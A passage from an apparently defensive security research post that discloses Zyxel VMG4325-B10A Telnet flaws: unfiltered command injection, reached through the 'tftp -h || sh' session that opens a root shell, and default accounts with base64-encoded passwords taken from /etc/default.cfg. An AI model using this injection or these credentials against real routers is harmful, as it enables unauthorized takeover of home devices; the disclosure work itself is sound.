",[886,55389,55390],{},"ifconfig",[18,55392,55393],{},[68,55394],{":width":10862,"alt":55395,"src":55396},"Decompiled Command Table","\u002Fblog\u002Fzyxel-telnet-vulns\u002Fclitable.png",[18,55398,55399,55400,55402,55403,55406,55407,55409,55410,55412,55413,55415,55416,50864,55419,59],{},"Instead, ",[886,55401,55390],{}," is passed to ",[886,55404,55405],{},"prctl_runCommandInShellWithTimeout",". This is where the trouble starts, because ",[886,55408,55366],{}," only verifies that the command starts with ",[886,55411,55390],{}," before invoking ",[886,55414,55405],{},", which is merely a thin wrapper around ",[886,55417,55418],{},"runCommandInShell",[886,55420,55421],{},"libcms_util.so",[18,55423,55424],{},[68,55425],{":width":10862,"alt":55426,"src":55427},"Decompiled runCommandInShell","\u002Fblog\u002Fzyxel-telnet-vulns\u002FrunCommand.png",[18,55429,55430,55431,55433,55434,55436],{},"The decompiled function above shows that ",[886,55432,55418],{}," has no filtering. As a result, Telnet commands that are passed to ",[886,55435,55405],{}," are vulnerable to command injection. The affected commands include:",[22,55438,55439,55442,55444,55446,55449,55452,55454],{},[25,55440,55441],{},"cat",[25,55443,55390],{},[25,55445,22770],{},[25,55447,55448],{},"ps",[25,55450,55451],{},"pwd",[25,55453,37669],{},[25,55455,55456],{},"wlctl",[18,55458,55459,55460,55463,55464,55466,55467,55470],{},"Because there is no filtering, the command injection can be executed in multiple ways. For example, the following uses ",[886,55461,55462],{},"||"," to execute additional commands after forcing ",[886,55465,37669],{}," to fail with the -",[886,55468,55469],{},"h"," flag:",[1354,55472,55476],{"className":55473,"code":55474,"language":55475,"meta":219,"style":219},"language-shell shiki shiki-themes material-theme-lighter github-light github-dark monokai","albinolobster@mournland:~$ telnet 192.168.0.1\nTrying 192.168.0.1...\nConnected to 192.168.0.1.\nEscape character is '^]'.\nZyxel VMG4325-B10A\nLogin: zyuser\nPassword:\n > tftp -h || sh\ntftp: invalid option -- h\nBusyBox v1.17.2 (2017-06-15 12:25:20 CST) multi-call binary.\n\nUsage: tftp [OPTIONS] HOST [PORT]\n\nTransfer a file from\u002Fto tftp server\n\nOptions:\n -l FILE Local FILE\n -r FILE Remote FILE\n -g Get file\n -p Put file\n -g -t i -f filename server_ip Get (flash) broadcom or whole image to modem\n -g -t c -f filename server_ip Get (flash) config file to modem\n -p -t f -f filename server_ip Put (backup) config file to tftpd server\n\n\n\nBusyBox v1.17.2 (2017-06-15 12:25:20 CST) built-in shell (ash)\nEnter 'help' for a list of built-in commands.\n\n# ls -l\ndrwxr-xr-x 3 supervis root 0 Jan 1 1970 app\ndrwxr-xr-x 2 supervis root 0 Jun 15 2017 bin\n-rw-r--r-- 1 supervis root 163928 Jun 15 2017 cferam.000\ndrwxr-xr-x 4 supervis root 0 Jan 1 1970 data\ndrwxrwxr-x 4 supervis root 0 Jun 15 2017 dev\ndrwxr-xr-x 10 supervis root 0 Jun 15 2017 etc\ndrwxr-xr-x 2 supervis root 0 Jan 1 1970 home\ndrwxrwxr-x 6 supervis root 0 Jun 15 2017 lib\nlrwxrwxrwx 1 supervis root 11 Jun 15 2017 linuxrc -> bin\u002Fbusybox\ndrwxr-xr-x 2 supervis root 0 Jan 1 1970 log\ndrwxr-xr-x 2 supervis root 0 Jan 3 20:29 mnt\ndrwxrwxr-x 5 supervis root 0 Jun 15 2017 opt\ndr-xr-xr-x 90 supervis root 0 Jan 1 1970 proc\ndrwxrwxr-x 2 supervis root 0 Jun 15 2017 sbin\ndrwxr-xr-x 11 supervis root 0 Jan 1 1970 sys\nlrwxrwxrwx 1 supervis root 8 Jun 15 2017 tmp -> \u002Fvar\u002Ftmp\ndrwxrwxr-x 4 supervis root 0 Jun 15 2017 usr\ndrwxr-xr-x 14 supervis root 0 Jan 3 22:09 var\n-rw-rw-r-- 1 supervis root 1446798 Jun 15 2017 vmlinux.lz\ndrwxrwxr-x 4 supervis root 0 Jun 15 2017 webs\n#\n","shell",[886,55477,55478,55489,55497,55507,55528,55536,55544,55549,55564,55581,55601,55605,55622,55626,55643,55647,55652,55666,55678,55689,55699,55722,55742,55762,55766,55770,55774,55794,55822,55826,55831,55860,55884,55907,55929,55951,55973,55994,56016,56046,56067,56090,56111,56134,56155,56177,56206,56227,56250,56273,56294],{"__ignoreMap":219},[1373,55479,55480,55483,55486],{"class":1375,"line":1376},[1373,55481,55482],{"class":2206},"albinolobster@mournland:~$",[1373,55484,55485],{"class":1391}," telnet",[1373,55487,55488],{"class":5467}," 192.168.0.1\n",[1373,55490,55491,55494],{"class":1375,"line":220},[1373,55492,55493],{"class":2206},"Trying",[1373,55495,55496],{"class":1391}," 192.168.0.1...\n",[1373,55498,55499,55501,55504],{"class":1375,"line":1266},[1373,55500,19141],{"class":2206},[1373,55502,55503],{"class":1391}," to",[1373,55505,55506],{"class":1391}," 192.168.0.1.\n",[1373,55508,55509,55512,55515,55518,55520,55523,55525],{"class":1375,"line":1852},[1373,55510,55511],{"class":2206},"Escape",[1373,55513,55514],{"class":1391}," character",[1373,55516,55517],{"class":1391}," is",[1373,55519,4713],{"class":1387},[1373,55521,55522],{"class":1391},"^]",[1373,55524,1388],{"class":1387},[1373,55526,55527],{"class":1391},".\n",[1373,55529,55530,55533],{"class":1375,"line":4692},[1373,55531,55532],{"class":2206},"Zyxel",[1373,55534,55535],{"class":1391}," VMG4325-B10A\n",[1373,55537,55538,55541],{"class":1375,"line":4724},[1373,55539,55540],{"class":2206},"Login:",[1373,55542,55543],{"class":1391}," zyuser\n",[1373,55545,55546],{"class":1375,"line":4756},[1373,55547,55548],{"class":2206},"Password:\n",[1373,55550,55551,55553,55556,55559,55561],{"class":1375,"line":4768},[1373,55552,11741],{"class":1397},[1373,55554,55555],{"class":2206}," tftp",[1373,55557,55558],{"class":2209}," -h",[1373,55560,2219],{"class":1397},[1373,55562,55563],{"class":2206}," sh\n",[1373,55565,55566,55569,55572,55575,55578],{"class":1375,"line":4792},[1373,55567,55568],{"class":2206},"tftp:",[1373,55570,55571],{"class":1391}," invalid",[1373,55573,55574],{"class":1391}," option",[1373,55576,55577],{"class":2209}," --",[1373,55579,55580],{"class":1391}," h\n",[1373,55582,55583,55586,55589,55592,55595,55598],{"class":1375,"line":4798},[1373,55584,55585],{"class":2206},"BusyBox",[1373,55587,55588],{"class":1391}," v1.17.2",[1373,55590,55591],{"class":4640}," (2017-06-15 ",[1373,55593,55594],{"class":1391},"12:25:20",[1373,55596,55597],{"class":1391}," CST",[1373,55599,55600],{"class":4640},") multi-call binary.\n",[1373,55602,55603],{"class":1375,"line":4806},[1373,55604,6520],{"emptyLinePlaceholder":237},[1373,55606,55607,55610,55612,55615,55617,55620],{"class":1375,"line":4817},[1373,55608,55609],{"class":2206},"Usage:",[1373,55611,55555],{"class":1391},[1373,55613,55614],{"class":4640}," [OPTIONS] HOST ",[1373,55616,7035],{"class":1383},[1373,55618,55619],{"class":4640},"PORT",[1373,55621,7103],{"class":1383},[1373,55623,55624],{"class":1375,"line":4825},[1373,55625,6520],{"emptyLinePlaceholder":237},[1373,55627,55628,55631,55633,55635,55638,55640],{"class":1375,"line":4835},[1373,55629,55630],{"class":2206},"Transfer",[1373,55632,52105],{"class":1391},[1373,55634,8738],{"class":1391},[1373,55636,55637],{"class":1391}," from\u002Fto",[1373,55639,55555],{"class":1391},[1373,55641,55642],{"class":1391}," server\n",[1373,55644,55645],{"class":1375,"line":4843},[1373,55646,6520],{"emptyLinePlaceholder":237},[1373,55648,55649],{"class":1375,"line":4849},[1373,55650,55651],{"class":2206},"Options:\n",[1373,55653,55654,55657,55660,55663],{"class":1375,"line":4877},[1373,55655,55656],{"class":2206}," -l",[1373,55658,55659],{"class":1391}," FILE",[1373,55661,55662],{"class":1391}," Local",[1373,55664,55665],{"class":1391}," FILE\n",[1373,55667,55668,55671,55673,55676],{"class":1375,"line":4915},[1373,55669,55670],{"class":2206}," -r",[1373,55672,55659],{"class":1391},[1373,55674,55675],{"class":1391}," Remote",[1373,55677,55665],{"class":1391},[1373,55679,55680,55683,55686],{"class":1375,"line":4931},[1373,55681,55682],{"class":2206}," -g",[1373,55684,55685],{"class":1391}," Get",[1373,55687,55688],{"class":1391}," file\n",[1373,55690,55691,55694,55697],{"class":1375,"line":4947},[1373,55692,55693],{"class":2206}," -p",[1373,55695,55696],{"class":1391}," Put",[1373,55698,55688],{"class":1391},[1373,55700,55701,55703,55706,55708,55711,55714,55717,55719],{"class":1375,"line":4952},[1373,55702,55682],{"class":2206},[1373,55704,55705],{"class":2209}," -t",[1373,55707,38449],{"class":1391},[1373,55709,55710],{"class":2209}," -f",[1373,55712,55713],{"class":1391}," filename",[1373,55715,55716],{"class":1391}," server_ip",[1373,55718,55685],{"class":1391},[1373,55720,55721],{"class":4640}," (flash) broadcom or whole image to modem\n",[1373,55723,55724,55726,55728,55731,55733,55735,55737,55739],{"class":1375,"line":6776},[1373,55725,55682],{"class":2206},[1373,55727,55705],{"class":2209},[1373,55729,55730],{"class":1391}," c",[1373,55732,55710],{"class":2209},[1373,55734,55713],{"class":1391},[1373,55736,55716],{"class":1391},[1373,55738,55685],{"class":1391},[1373,55740,55741],{"class":4640}," (flash) config file to modem\n",[1373,55743,55744,55746,55748,55751,55753,55755,55757,55759],{"class":1375,"line":6781},[1373,55745,55693],{"class":2206},[1373,55747,55705],{"class":2209},[1373,55749,55750],{"class":1391}," f",[1373,55752,55710],{"class":2209},[1373,55754,55713],{"class":1391},[1373,55756,55716],{"class":1391},[1373,55758,55696],{"class":1391},[1373,55760,55761],{"class":4640}," (backup) config file to tftpd server\n",[1373,55763,55764],{"class":1375,"line":7524},[1373,55765,6520],{"emptyLinePlaceholder":237},[1373,55767,55768],{"class":1375,"line":7530},[1373,55769,6520],{"emptyLinePlaceholder":237},[1373,55771,55772],{"class":1375,"line":7546},[1373,55773,6520],{"emptyLinePlaceholder":237},[1373,55775,55776,55778,55780,55782,55784,55786,55789,55792],{"class":1375,"line":7571},[1373,55777,55585],{"class":2206},[1373,55779,55588],{"class":1391},[1373,55781,55591],{"class":4640},[1373,55783,55594],{"class":1391},[1373,55785,55597],{"class":1391},[1373,55787,55788],{"class":4640},") built-in shell (",[1373,55790,55791],{"class":2206},"ash",[1373,55793,11875],{"class":4640},[1373,55795,55796,55799,55801,55803,55805,55808,55810,55813,55816,55819],{"class":1375,"line":7598},[1373,55797,55798],{"class":2206},"Enter",[1373,55800,4713],{"class":1387},[1373,55802,39134],{"class":1391},[1373,55804,1388],{"class":1387},[1373,55806,55807],{"class":1391}," for",[1373,55809,52105],{"class":1391},[1373,55811,55812],{"class":1391}," list",[1373,55814,55815],{"class":1391}," of",[1373,55817,55818],{"class":1391}," built-in",[1373,55820,55821],{"class":1391}," commands.\n",[1373,55823,55824],{"class":1375,"line":7615},[1373,55825,6520],{"emptyLinePlaceholder":237},[1373,55827,55828],{"class":1375,"line":7635},[1373,55829,55830],{"class":4630},"# ls -l\n",[1373,55832,55833,55836,55839,55842,55845,55848,55851,55854,55857],{"class":1375,"line":7640},[1373,55834,55835],{"class":2206},"drwxr-xr-x",[1373,55837,55838],{"class":5467}," 3",[1373,55840,55841],{"class":1391}," supervis",[1373,55843,55844],{"class":1391}," root",[1373,55846,55847],{"class":5467}," 0",[1373,55849,55850],{"class":1391}," Jan",[1373,55852,55853],{"class":5467}," 1",[1373,55855,55856],{"class":5467}," 1970",[1373,55858,55859],{"class":1391}," app\n",[1373,55861,55862,55864,55866,55868,55870,55872,55875,55878,55881],{"class":1375,"line":7648},[1373,55863,55835],{"class":2206},[1373,55865,5499],{"class":5467},[1373,55867,55841],{"class":1391},[1373,55869,55844],{"class":1391},[1373,55871,55847],{"class":5467},[1373,55873,55874],{"class":1391}," Jun",[1373,55876,55877],{"class":5467}," 15",[1373,55879,55880],{"class":5467}," 2017",[1373,55882,55883],{"class":1391}," bin\n",[1373,55885,55886,55889,55891,55893,55895,55898,55900,55902,55904],{"class":1375,"line":7672},[1373,55887,55888],{"class":2206},"-rw-r--r--",[1373,55890,5468],{"class":5467},[1373,55892,55841],{"class":1391},[1373,55894,55844],{"class":1391},[1373,55896,55897],{"class":5467}," 163928",[1373,55899,55874],{"class":1391},[1373,55901,55877],{"class":5467},[1373,55903,55880],{"class":5467},[1373,55905,55906],{"class":1391}," cferam.000\n",[1373,55908,55909,55911,55914,55916,55918,55920,55922,55924,55926],{"class":1375,"line":7688},[1373,55910,55835],{"class":2206},[1373,55912,55913],{"class":5467}," 4",[1373,55915,55841],{"class":1391},[1373,55917,55844],{"class":1391},[1373,55919,55847],{"class":5467},[1373,55921,55850],{"class":1391},[1373,55923,55853],{"class":5467},[1373,55925,55856],{"class":5467},[1373,55927,55928],{"class":1391}," data\n",[1373,55930,55931,55934,55936,55938,55940,55942,55944,55946,55948],{"class":1375,"line":7709},[1373,55932,55933],{"class":2206},"drwxrwxr-x",[1373,55935,55913],{"class":5467},[1373,55937,55841],{"class":1391},[1373,55939,55844],{"class":1391},[1373,55941,55847],{"class":5467},[1373,55943,55874],{"class":1391},[1373,55945,55877],{"class":5467},[1373,55947,55880],{"class":5467},[1373,55949,55950],{"class":1391}," dev\n",[1373,55952,55953,55955,55958,55960,55962,55964,55966,55968,55970],{"class":1375,"line":7714},[1373,55954,55835],{"class":2206},[1373,55956,55957],{"class":5467}," 10",[1373,55959,55841],{"class":1391},[1373,55961,55844],{"class":1391},[1373,55963,55847],{"class":5467},[1373,55965,55874],{"class":1391},[1373,55967,55877],{"class":5467},[1373,55969,55880],{"class":5467},[1373,55971,55972],{"class":1391}," etc\n",[1373,55974,55975,55977,55979,55981,55983,55985,55987,55989,55991],{"class":1375,"line":7722},[1373,55976,55835],{"class":2206},[1373,55978,5499],{"class":5467},[1373,55980,55841],{"class":1391},[1373,55982,55844],{"class":1391},[1373,55984,55847],{"class":5467},[1373,55986,55850],{"class":1391},[1373,55988,55853],{"class":5467},[1373,55990,55856],{"class":5467},[1373,55992,55993],{"class":1391}," home\n",[1373,55995,55996,55998,56001,56003,56005,56007,56009,56011,56013],{"class":1375,"line":9903},[1373,55997,55933],{"class":2206},[1373,55999,56000],{"class":5467}," 6",[1373,56002,55841],{"class":1391},[1373,56004,55844],{"class":1391},[1373,56006,55847],{"class":5467},[1373,56008,55874],{"class":1391},[1373,56010,55877],{"class":5467},[1373,56012,55880],{"class":5467},[1373,56014,56015],{"class":1391}," lib\n",[1373,56017,56018,56021,56023,56025,56027,56030,56032,56034,56036,56039,56041,56043],{"class":1375,"line":9908},[1373,56019,56020],{"class":2206},"lrwxrwxrwx",[1373,56022,5468],{"class":5467},[1373,56024,55841],{"class":1391},[1373,56026,55844],{"class":1391},[1373,56028,56029],{"class":5467}," 11",[1373,56031,55874],{"class":1391},[1373,56033,55877],{"class":5467},[1373,56035,55880],{"class":5467},[1373,56037,56038],{"class":1391}," linuxrc",[1373,56040,27425],{"class":4640},[1373,56042,5384],{"class":1397},[1373,56044,56045],{"class":1391}," bin\u002Fbusybox\n",[1373,56047,56048,56050,56052,56054,56056,56058,56060,56062,56064],{"class":1375,"line":9913},[1373,56049,55835],{"class":2206},[1373,56051,5499],{"class":5467},[1373,56053,55841],{"class":1391},[1373,56055,55844],{"class":1391},[1373,56057,55847],{"class":5467},[1373,56059,55850],{"class":1391},[1373,56061,55853],{"class":5467},[1373,56063,55856],{"class":5467},[1373,56065,56066],{"class":1391}," log\n",[1373,56068,56069,56071,56073,56075,56077,56079,56081,56084,56087],{"class":1375,"line":9932},[1373,56070,55835],{"class":2206},[1373,56072,5499],{"class":5467},[1373,56074,55841],{"class":1391},[1373,56076,55844],{"class":1391},[1373,56078,55847],{"class":5467},[1373,56080,55850],{"class":1391},[1373,56082,56083],{"class":5467}," 3",[1373,56085,56086],{"class":1391}," 20:29",[1373,56088,56089],{"class":1391}," mnt\n",[1373,56091,56092,56094,56096,56098,56100,56102,56104,56106,56108],{"class":1375,"line":9937},[1373,56093,55933],{"class":2206},[1373,56095,17176],{"class":5467},[1373,56097,55841],{"class":1391},[1373,56099,55844],{"class":1391},[1373,56101,55847],{"class":5467},[1373,56103,55874],{"class":1391},[1373,56105,55877],{"class":5467},[1373,56107,55880],{"class":5467},[1373,56109,56110],{"class":1391}," opt\n",[1373,56112,56113,56116,56119,56121,56123,56125,56127,56129,56131],{"class":1375,"line":9957},[1373,56114,56115],{"class":2206},"dr-xr-xr-x",[1373,56117,56118],{"class":5467}," 90",[1373,56120,55841],{"class":1391},[1373,56122,55844],{"class":1391},[1373,56124,55847],{"class":5467},[1373,56126,55850],{"class":1391},[1373,56128,55853],{"class":5467},[1373,56130,55856],{"class":5467},[1373,56132,56133],{"class":1391}," proc\n",[1373,56135,56136,56138,56140,56142,56144,56146,56148,56150,56152],{"class":1375,"line":9962},[1373,56137,55933],{"class":2206},[1373,56139,5499],{"class":5467},[1373,56141,55841],{"class":1391},[1373,56143,55844],{"class":1391},[1373,56145,55847],{"class":5467},[1373,56147,55874],{"class":1391},[1373,56149,55877],{"class":5467},[1373,56151,55880],{"class":5467},[1373,56153,56154],{"class":1391}," sbin\n",[1373,56156,56157,56159,56162,56164,56166,56168,56170,56172,56174],{"class":1375,"line":15955},[1373,56158,55835],{"class":2206},[1373,56160,56161],{"class":5467}," 11",[1373,56163,55841],{"class":1391},[1373,56165,55844],{"class":1391},[1373,56167,55847],{"class":5467},[1373,56169,55850],{"class":1391},[1373,56171,55853],{"class":5467},[1373,56173,55856],{"class":5467},[1373,56175,56176],{"class":1391}," sys\n",[1373,56178,56179,56181,56183,56185,56187,56190,56192,56194,56196,56199,56201,56203],{"class":1375,"line":16030},[1373,56180,56020],{"class":2206},[1373,56182,5468],{"class":5467},[1373,56184,55841],{"class":1391},[1373,56186,55844],{"class":1391},[1373,56188,56189],{"class":5467}," 8",[1373,56191,55874],{"class":1391},[1373,56193,55877],{"class":5467},[1373,56195,55880],{"class":5467},[1373,56197,56198],{"class":1391}," tmp",[1373,56200,27425],{"class":4640},[1373,56202,5384],{"class":1397},[1373,56204,56205],{"class":1391}," \u002Fvar\u002Ftmp\n",[1373,56207,56208,56210,56212,56214,56216,56218,56220,56222,56224],{"class":1375,"line":16035},[1373,56209,55933],{"class":2206},[1373,56211,55913],{"class":5467},[1373,56213,55841],{"class":1391},[1373,56215,55844],{"class":1391},[1373,56217,55847],{"class":5467},[1373,56219,55874],{"class":1391},[1373,56221,55877],{"class":5467},[1373,56223,55880],{"class":5467},[1373,56225,56226],{"class":1391}," usr\n",[1373,56228,56229,56231,56234,56236,56238,56240,56242,56244,56247],{"class":1375,"line":16083},[1373,56230,55835],{"class":2206},[1373,56232,56233],{"class":5467}," 14",[1373,56235,55841],{"class":1391},[1373,56237,55844],{"class":1391},[1373,56239,55847],{"class":5467},[1373,56241,55850],{"class":1391},[1373,56243,56083],{"class":5467},[1373,56245,56246],{"class":1391}," 22:09",[1373,56248,56249],{"class":1391}," var\n",[1373,56251,56252,56255,56257,56259,56261,56264,56266,56268,56270],{"class":1375,"line":16098},[1373,56253,56254],{"class":2206},"-rw-rw-r--",[1373,56256,5468],{"class":5467},[1373,56258,55841],{"class":1391},[1373,56260,55844],{"class":1391},[1373,56262,56263],{"class":5467}," 1446798",[1373,56265,55874],{"class":1391},[1373,56267,55877],{"class":5467},[1373,56269,55880],{"class":5467},[1373,56271,56272],{"class":1391}," vmlinux.lz\n",[1373,56274,56275,56277,56279,56281,56283,56285,56287,56289,56291],{"class":1375,"line":16103},[1373,56276,55933],{"class":2206},[1373,56278,55913],{"class":5467},[1373,56280,55841],{"class":1391},[1373,56282,55844],{"class":1391},[1373,56284,55847],{"class":5467},[1373,56286,55874],{"class":1391},[1373,56288,55877],{"class":5467},[1373,56290,55880],{"class":5467},[1373,56292,56293],{"class":1391}," webs\n",[1373,56295,56296],{"class":1375,"line":16147},[1373,56297,56298],{"class":4630},"#\n",[18,56300,56301,56302,59],{},"This technique can be repeated against the other affected commands using various combinations of ",[47,56303,56306],{"href":56304,"rel":56305},"https:\u002F\u002Fwww.gnu.org\u002Fsoftware\u002Fbash\u002Fmanual\u002Fhtml_node\u002FDefinitions.html#index-metacharacter",[51],"shell metacharacters",[1920,56308,56310],{"id":56309},"cve-2025-0890-default-credentials","CVE-2025-0890: Default Credentials",[18,56312,56313,56314,56319,56320,56323],{},"By itself, an authenticated command injection has limited value to an attacker—especially over Telnet, which ideally should not be exposed to the internet (though, in reality, ",[47,56315,56318],{"href":56316,"rel":56317},"https:\u002F\u002Fen.fofa.info\u002Fresult?qbase64=cHJvdG9jb2w9InRlbG5ldCI%3D",[51],"millions"," of devices are). The impact of CVE-2024-40891 depends heavily on an authentication bypass or default credentials. Unfortunately, these affected devices appear to be provisioned with default accounts, all of which can be found in the device’s ",[886,56321,56322],{},"\u002Fetc\u002Fdefault.cfg"," file. Here is a snippet from our VMG4325-B10A:",[1354,56325,56329],{"className":56326,"code":56327,"language":56328,"meta":219,"style":219},"language-xml shiki shiki-themes material-theme-lighter github-light github-dark monokai","\u003CX_404A03_LoginCfg>\n \u003CAdminUserName>supervisor\u003C\u002FAdminUserName>\n \u003CAdminPassword>enlhZDEyMzQ=\u003C\u002FAdminPassword>\n\u003CX_404A03_LoginGroupNumberOfEntries>2\u003C\u002FX_404A03_LoginGroupNumberOfEntries>\n\u003CX_404A03_Login_Group instance=\"1\">\n \u003CPrivilege>broadband,wireless,homeNetworking,routing,qos,nat,dns,igmpSetting,halfBridge,intfGrp,usbService,firewall,macFilter,parentalControl,schedulerRule,certificates,ipsecVPN,log,trafficStatus,arpTable,routeTable,igmpGroupStatus,xdslStatistics,system,userAccount,remoteMGMT,tr069Client,tr064,time,emailNotification,logSetting,firmwareUpgrade,configuration,reboot,disagnostic,HelpDesk,wizard,sniffer,snmp\u003C\u002FPrivilege>\n \u003CName>Administrator\u003C\u002FName>\n \u003CConsoleLevel>2\u003C\u002FConsoleLevel>\n \u003CUse_Login_Info instance=\"1\">\n \u003CUserName>admin\u003C\u002FUserName>\n \u003CPassword>MTIzNAA=\u003C\u002FPassword>\n \u003CLoginFailCount>0\u003C\u002FLoginFailCount>\n \u003CLoginFailCountLeft>1\u003C\u002FLoginFailCountLeft>\n \u003C\u002FUse_Login_Info>\n \u003CUse_Login_Info nextInstance=\"2\" >\u003C\u002FUse_Login_Info>\n\u003C\u002FX_404A03_Login_Group>\n\u003CX_404A03_Login_Group instance=\"2\">\n \u003CGroupKey>2\u003C\u002FGroupKey>\n \u003CPrivilege>broadband,wireless,homeNetworking,routing,qos,nat,dns,igmpSetting,halfBridge,intfGrp,usbService,firewall,macFilter,parentalControl,schedulerRule,certificates,ipsecVPN,log,trafficStatus,arpTable,routeTable,igmpGroupStatus,xdslStatistics,system,userAccount,remoteMGMT,tr069Client,tr064,time,emailNotification,logSetting,firmwareUpgrade,configuration,reboot,disagnostic,HelpDesk,wizard,sniffer,snmp\u003C\u002FPrivilege>\n \u003CName>User\u003C\u002FName>\n \u003CConsoleLevel>2\u003C\u002FConsoleLevel>\n \u003CUse_Login_Info instance=\"1\">\n \u003CUserName>zyuser\u003C\u002FUserName>\n \u003CPassword>MTIzNAA=\u003C\u002FPassword>\n \u003CLoginFailCount>0\u003C\u002FLoginFailCount>\n \u003CLoginFailCountLeft>1\u003C\u002FLoginFailCountLeft>\n \u003C\u002FUse_Login_Info>\n \u003CUse_Login_Info nextInstance=\"2\" >\u003C\u002FUse_Login_Info>\n\u003C\u002FX_404A03_Login_Group>\n\u003CX_404A03_Login_Group nextInstance=\"3\" >\u003C\u002FX_404A03_Login_Group>\n\u003C\u002FX_404A03_LoginCfg>\n","xml",[886,56330,56331,56340,56358,56376,56393,56413,56431,56448,56465,56484,56501,56519,56536,56553,56562,56586,56594,56612,56629,56645,56662,56678,56696,56713,56729,56745,56761,56769,56791,56799,56821],{"__ignoreMap":219},[1373,56332,56333,56335,56338],{"class":1375,"line":1376},[1373,56334,11852],{"class":1383},[1373,56336,56337],{"class":6300},"X_404A03_LoginCfg",[1373,56339,6765],{"class":1383},[1373,56341,56342,56344,56347,56349,56352,56354,56356],{"class":1375,"line":220},[1373,56343,8246],{"class":1383},[1373,56345,56346],{"class":6300},"AdminUserName",[1373,56348,5384],{"class":1383},[1373,56350,56351],{"class":4640},"supervisor",[1373,56353,46627],{"class":1383},[1373,56355,56346],{"class":6300},[1373,56357,6765],{"class":1383},[1373,56359,56360,56362,56365,56367,56370,56372,56374],{"class":1375,"line":1266},[1373,56361,8246],{"class":1383},[1373,56363,56364],{"class":6300},"AdminPassword",[1373,56366,5384],{"class":1383},[1373,56368,56369],{"class":4640},"enlhZDEyMzQ=",[1373,56371,46627],{"class":1383},[1373,56373,56364],{"class":6300},[1373,56375,6765],{"class":1383},[1373,56377,56378,56380,56383,56385,56387,56389,56391],{"class":1375,"line":1852},[1373,56379,11852],{"class":1383},[1373,56381,56382],{"class":6300},"X_404A03_LoginGroupNumberOfEntries",[1373,56384,5384],{"class":1383},[1373,56386,353],{"class":4640},[1373,56388,46627],{"class":1383},[1373,56390,56382],{"class":6300},[1373,56392,6765],{"class":1383},[1373,56394,56395,56397,56400,56403,56405,56407,56409,56411],{"class":1375,"line":4692},[1373,56396,11852],{"class":1383},[1373,56398,56399],{"class":6300},"X_404A03_Login_Group",[1373,56401,56402],{"class":8252}," instance",[1373,56404,5417],{"class":1383},[1373,56406,183],{"class":1387},[1373,56408,467],{"class":1391},[1373,56410,183],{"class":1387},[1373,56412,6765],{"class":1383},[1373,56414,56415,56417,56420,56422,56425,56427,56429],{"class":1375,"line":4724},[1373,56416,8246],{"class":1383},[1373,56418,56419],{"class":6300},"Privilege",[1373,56421,5384],{"class":1383},[1373,56423,56424],{"class":4640},"broadband,wireless,homeNetworking,routing,qos,nat,dns,igmpSetting,halfBridge,intfGrp,usbService,firewall,macFilter,parentalControl,schedulerRule,certificates,ipsecVPN,log,trafficStatus,arpTable,routeTable,igmpGroupStatus,xdslStatistics,system,userAccount,remoteMGMT,tr069Client,tr064,time,emailNotification,logSetting,firmwareUpgrade,configuration,reboot,disagnostic,HelpDesk,wizard,sniffer,snmp",[1373,56426,46627],{"class":1383},[1373,56428,56419],{"class":6300},[1373,56430,6765],{"class":1383},[1373,56432,56433,56435,56437,56439,56442,56444,56446],{"class":1375,"line":4756},[1373,56434,8246],{"class":1383},[1373,56436,30775],{"class":6300},[1373,56438,5384],{"class":1383},[1373,56440,56441],{"class":4640},"Administrator",[1373,56443,46627],{"class":1383},[1373,56445,30775],{"class":6300},[1373,56447,6765],{"class":1383},[1373,56449,56450,56452,56455,56457,56459,56461,56463],{"class":1375,"line":4768},[1373,56451,8246],{"class":1383},[1373,56453,56454],{"class":6300},"ConsoleLevel",[1373,56456,5384],{"class":1383},[1373,56458,353],{"class":4640},[1373,56460,46627],{"class":1383},[1373,56462,56454],{"class":6300},[1373,56464,6765],{"class":1383},[1373,56466,56467,56469,56472,56474,56476,56478,56480,56482],{"class":1375,"line":4792},[1373,56468,8246],{"class":1383},[1373,56470,56471],{"class":6300},"Use_Login_Info",[1373,56473,56402],{"class":8252},[1373,56475,5417],{"class":1383},[1373,56477,183],{"class":1387},[1373,56479,467],{"class":1391},[1373,56481,183],{"class":1387},[1373,56483,6765],{"class":1383},[1373,56485,56486,56488,56491,56493,56495,56497,56499],{"class":1375,"line":4798},[1373,56487,8246],{"class":1383},[1373,56489,56490],{"class":6300},"UserName",[1373,56492,5384],{"class":1383},[1373,56494,5800],{"class":4640},[1373,56496,46627],{"class":1383},[1373,56498,56490],{"class":6300},[1373,56500,6765],{"class":1383},[1373,56502,56503,56505,56508,56510,56513,56515,56517],{"class":1375,"line":4806},[1373,56504,8246],{"class":1383},[1373,56506,56507],{"class":6300},"Password",[1373,56509,5384],{"class":1383},[1373,56511,56512],{"class":4640},"MTIzNAA=",[1373,56514,46627],{"class":1383},[1373,56516,56507],{"class":6300},[1373,56518,6765],{"class":1383},[1373,56520,56521,56523,56526,56528,56530,56532,56534],{"class":1375,"line":4817},[1373,56522,8246],{"class":1383},[1373,56524,56525],{"class":6300},"LoginFailCount",[1373,56527,5384],{"class":1383},[1373,56529,445],{"class":4640},[1373,56531,46627],{"class":1383},[1373,56533,56525],{"class":6300},[1373,56535,6765],{"class":1383},[1373,56537,56538,56540,56543,56545,56547,56549,56551],{"class":1375,"line":4825},[1373,56539,8246],{"class":1383},[1373,56541,56542],{"class":6300},"LoginFailCountLeft",[1373,56544,5384],{"class":1383},[1373,56546,467],{"class":4640},[1373,56548,46627],{"class":1383},[1373,56550,56542],{"class":6300},[1373,56552,6765],{"class":1383},[1373,56554,56555,56558,56560],{"class":1375,"line":4835},[1373,56556,56557],{"class":1383}," \u003C\u002F",[1373,56559,56471],{"class":6300},[1373,56561,6765],{"class":1383},[1373,56563,56564,56566,56568,56571,56573,56575,56577,56579,56582,56584],{"class":1375,"line":4843},[1373,56565,8246],{"class":1383},[1373,56567,56471],{"class":6300},[1373,56569,56570],{"class":8252}," nextInstance",[1373,56572,5417],{"class":1383},[1373,56574,183],{"class":1387},[1373,56576,353],{"class":1391},[1373,56578,183],{"class":1387},[1373,56580,56581],{"class":1383}," 